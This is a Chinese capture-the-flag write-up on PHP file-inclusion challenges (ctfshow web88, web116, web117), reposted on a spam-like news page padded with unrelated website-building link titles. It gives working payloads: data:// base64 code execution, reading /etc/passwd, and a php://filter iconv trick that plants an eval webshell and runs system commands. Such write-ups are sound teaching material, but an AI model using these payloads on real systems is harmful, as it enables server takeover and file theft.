当前位置: 首页 > news >正文

saas和wordpresswin10一键优化工具

saas和wordpress,win10一键优化工具,摄影建设网站,一般网站建设步骤目录 1、web88 2、web116 3、web117 1、web88 没有过滤冒号 : ,可以使用 data 协议,但是过滤了括号和等号,因此需要编码绕过一下。 这里有点问题,我 (ls) 后加上分号发现不行,可能是编码结果有加号,题目…

目录

1、web88

2、web116

3、web117


1、web88

没有过滤冒号 : ,可以使用 data 协议,但是过滤了括号和等号,因此需要编码绕过一下。

这里有点问题,我 ('ls') 后加上分号发现不行,可能是编码结果有加号,题目做了过滤

报错:

Parse error: syntax error, unexpected '?' in data://text/plain;base64,PD9waHAgc3lzdGVtKCdscycpOz8 on line 1

去掉分号

得到 PD9waHAgc3lzdGVtKCdscycpPz4=,传入时要把等号去掉,因为题目过滤掉了等号,否则会触发 die 函数,即使去掉等号,base64 解码也是 <?php system('ls')?>。

构造 payload:

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdscycpPz4

或者这样:<?php system('ls');

总的来说就是要避免加号的出现,然后如果结尾有等号要去掉。

payload:

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdscycpOw

 

读取 flag:

payload:

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCd0YWMgZmwwZy5waHAnKTs/Pg

拿到 flag:ctfshow{1863caf3-bfd1-45ce-b2bf-e9f519a2c9b4}

2、web116

访问题目是一个视频,源码也没有什么有用信息

提示:misc+lfi

下载视频,使用 010editor 打开,发现存在 png 图片的数据

提取:

另存为 png 格式的图片:

打开发现是一段代码:

如果没有设置 file,那么默认就是 video/mp4,也就是我们前面看到的视频

以 get 方式给 file 传参进行文件包含,猜测是 flag.php,payload:

?file=flag.php

可以直接用 hackbar 将 mode 选择为 raw 进行请求,这样就和 burpsuite 一样 

拿到 flag:ctfshow{8cd4c26c-7482-4caa-8d4c-0b8de37226cb}

读一下 /etc/passwd,也是可以读取到的:

?file=/etc/passwd

3、web117

需要在绕过 filter 函数过滤的基础上,再来绕过死亡函数。base64、rot13、string 这些都被过滤了,果然尝试前面的方法,发现不行,因为正则匹配是针对 url 解码后的内容进行的。

把一句话木马从 UCS-2LE 编码转换为 UCS-2BE 编码:

<?php
$re = iconv("UCS-2LE","UCS-2BE", '<?php @eval($_GET[1]);?>');
echo $re;
?>

运行得到:

?<hp pe@av(l_$EG[T]1;)>?

post 传入:

contents=?<hp pe@av(l_$EG[T]1;)>?

payload: 

?file=php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=hack.php

之后调用 hack.php:

/hack.php?1=system('ls');

(其中 shll.php 是我最开始弄的,当时传 contents 传成了 content,少打了个 s) 

读取 flag:

/hack.php?1=system('tac flag.php');

拿到 flag:ctfshow{e6c7cd6d-c7b6-48bb-af5a-4316ac9b9314}

因为我们传入的一句话木马是先经过一遍编码转换的,之后又通过过滤器将其还原。

而题目自己添加进去的 <?php die();?> 则会被过滤器转换成无法识别的文本内容,导致无法执行。

我们可以来看一下 hack.php 的内容:

?<hp pid(e;)>? 肯定无法正常被解析为 php 代码,也就不会执行,而我们的一句话木马 <?php @eval($_GET[1]);?> 是正常的,因此可以被调用。

至此,ctfshow-web入门 -文件包含结束。 

Myon 2024.7.6

路漫漫其修远兮,吾将上下而求索。

http://www.yayakq.cn/news/155013/

相关文章:

  • 网站建设用户需求三只松鼠有趣的软文
  • 网站建设的几大要素天津企业模板建站
  • 服务器放多个网站wordpress主题 淘客
  • 网站开发 教程网页制作培训班培训
  • 艺术家个人网站设计即时热榜
  • 外贸公司做网站动态Js文件 做网站标题
  • 网站根目录验证文件是什么asp.net做的网站文字控件随窗口大小不变化
  • 只放一个图片做网站h5高端网站开发
  • 平板电脑可以做淘宝网站吗导航栏网页怎么制作
  • 外贸做包装袋哪个网站好中国建设教育协会网站查
  • 网站的网络推广策略有哪些手机端网站需要多少钱
  • 什么是网站地址有域名 有固定ip怎么做网站
  • 做网站江门积极推进网站建设
  • 网站icon图标怎么设置响应式网站的开发
  • 自己怎么给网站做优化排名重庆推广网站排名公司
  • 犀牛云做网站怎么这么贵网站建设业
  • 微网站开发案例网络服务合同法律规定
  • 江门建站网站模板重庆建站公司价钱
  • 做了微网站国际学校网站如何建设
  • 网页网站设计培训铝基板营销型网站建设
  • 企业网站备案信息查询济南公共资源交易中心
  • phpcms电影网站开发横峰网站建设
  • 保定手机网站建设360网址大全电脑版
  • 周口seo 网站创意网站建设公司
  • 颍州网站建设深圳品牌折扣店
  • 杭州 网站建设网络维护是什么意思
  • 贵阳经济技术开发区网站大型网站建设方案
  • 网站建设到发布2012sevser网站维护学习
  • 闸北区网站建设网页制服装购物网站排名
  • 网站seo步骤昆明网上商城网站建设